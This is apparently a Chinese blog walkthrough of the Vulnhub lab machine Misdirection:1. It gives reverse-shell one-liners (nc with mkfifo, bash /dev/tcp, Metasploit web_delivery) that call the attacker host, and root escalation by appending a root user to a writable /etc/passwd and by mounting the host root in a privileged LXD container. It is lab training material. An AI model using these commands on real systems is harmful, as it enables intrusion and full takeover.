Vulnhub靶机:MISDIRECTION_ 1

目录

  • 介绍
  • 信息收集
    • 主机发现
    • 主机信息探测
  • 网站探测
  • 反弹shell
    • 方式1:使用nc
    • 方式2:使用bash
    • 方式3:使用MSF
  • 提权
    • sudo提权
    • passwd提权
    • docker提权
  • 参考

介绍

系列:Misdirection(此系列共1台)
发布日期:2019 年 9 月 24 日
难度:初级
运行环境:官方推荐Virtualbox,我使用的是VMware
补充:靶机容易被干崩,下手轻点
目标:取得 root 权限
学习:

  • 主机发现
  • 端口扫描+漏洞扫描
  • 反弹shel
  • passwd提权
  • docker提权

靶机地址:https://www.vulnhub.com/entry/misdirection-1,371/

信息收集

主机发现

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

nmap发现了一些有趣的目录,疑似发现了sql注入,经核实为误报

nmap -p- 192.168.229.137
nmap -p22,80,3306,8080 -A 192.168.229.137
nmap -p22,80,3306,8080 --script=vuln 192.168.229.137

网站探测

80端口常规探测没有发现什么有趣的信息,但是nmap发现了8080端口的一个有趣目录:debug
访问之后如下图,很明显是个命令执行漏洞
Vulnhub靶机:MISDIRECTION_ 1_第1张图片

反弹shell

介绍3种方法

方式1:使用nc

由于靶机的nc没有-e参数,可以通过这种方式getshell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.229.128 1234 >/tmp/f

Vulnhub靶机:MISDIRECTION_ 1_第2张图片

方式2:使用bash

bash -c 'bash -i >& /dev/tcp/192.168.229.128/9999 0>&1'

Vulnhub靶机:MISDIRECTION_ 1_第3张图片

方式3:使用MSF

通过“Wappalyzer”得知,页面是php的,因此payload类型设置为php

use exploit/multi/script/web_delivery
show options
show targets
set target 1
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.229.128
exploit
sessions -i 1
shell
python -c 'import pty;pty.spawn("/bin/bash")'

Vulnhub靶机:MISDIRECTION_ 1_第4张图片

复制生成的命令,粘贴到靶机上面,一旦运行,我们就会拿到一个shell,由于靶机是有python的,可以通过python获取一个交互式的shell
Vulnhub靶机:MISDIRECTION_ 1_第5张图片

提权

sudo提权

通过sudo提权,切换身份为brexit
Vulnhub靶机:MISDIRECTION_ 1_第6张图片

passwd提权

丢个提权检查脚本,发现/etc/passwd具有可写权限,可以提权;似乎还可以docker提权
Vulnhub靶机:MISDIRECTION_ 1_第7张图片

Vulnhub靶机:MISDIRECTION_ 1_第8张图片

普普通通的passwd文件配置不当提权

openssl passwd -1 -salt hack hack123
echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash' >> /etc/passwd
tail /etc/passwd
su hack
hack123
id

docker提权

提权脚本检查到,似乎可以做docker提权,那就试试吧。

  1. 下载镜像

Linux 容器映像构建可在此处找到:https://us.lxd.images.canonical.com/images。我决定使用 Alpine Linux 映像,找到一个合适的镜像,使用kali全部下载下来

wget --no-parent -r https://us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20230104_13:00/
cd /us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20230104_13:00
find . -name '*html*' -delete
tar -cvf alpine.tar ./*

Vulnhub靶机:MISDIRECTION_ 1_第9张图片

  1. 投递镜像
kali开启web服务
python -m http.server 80

靶机下载解压
wget http://192.168.229.128/alpine.tar
mkdir alpine
tar -xvf alpine.tar -C alpine
cd alpine

  1. 手动导入容器映像
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxd init
lxc init alpine alpinect -c security.privileged=true
lxc config device add alpinect pwndisk disk source=/ path=/mnt/root recursive=true
lxc start alpinect
lxc exec alpinect /bin/sh

Vulnhub靶机:MISDIRECTION_ 1_第10张图片

Vulnhub靶机:MISDIRECTION_ 1_第11张图片

参考

https://benheater.com/vulnhub-misdirection-1/

你可能感兴趣的:(靶机,Vulnhub)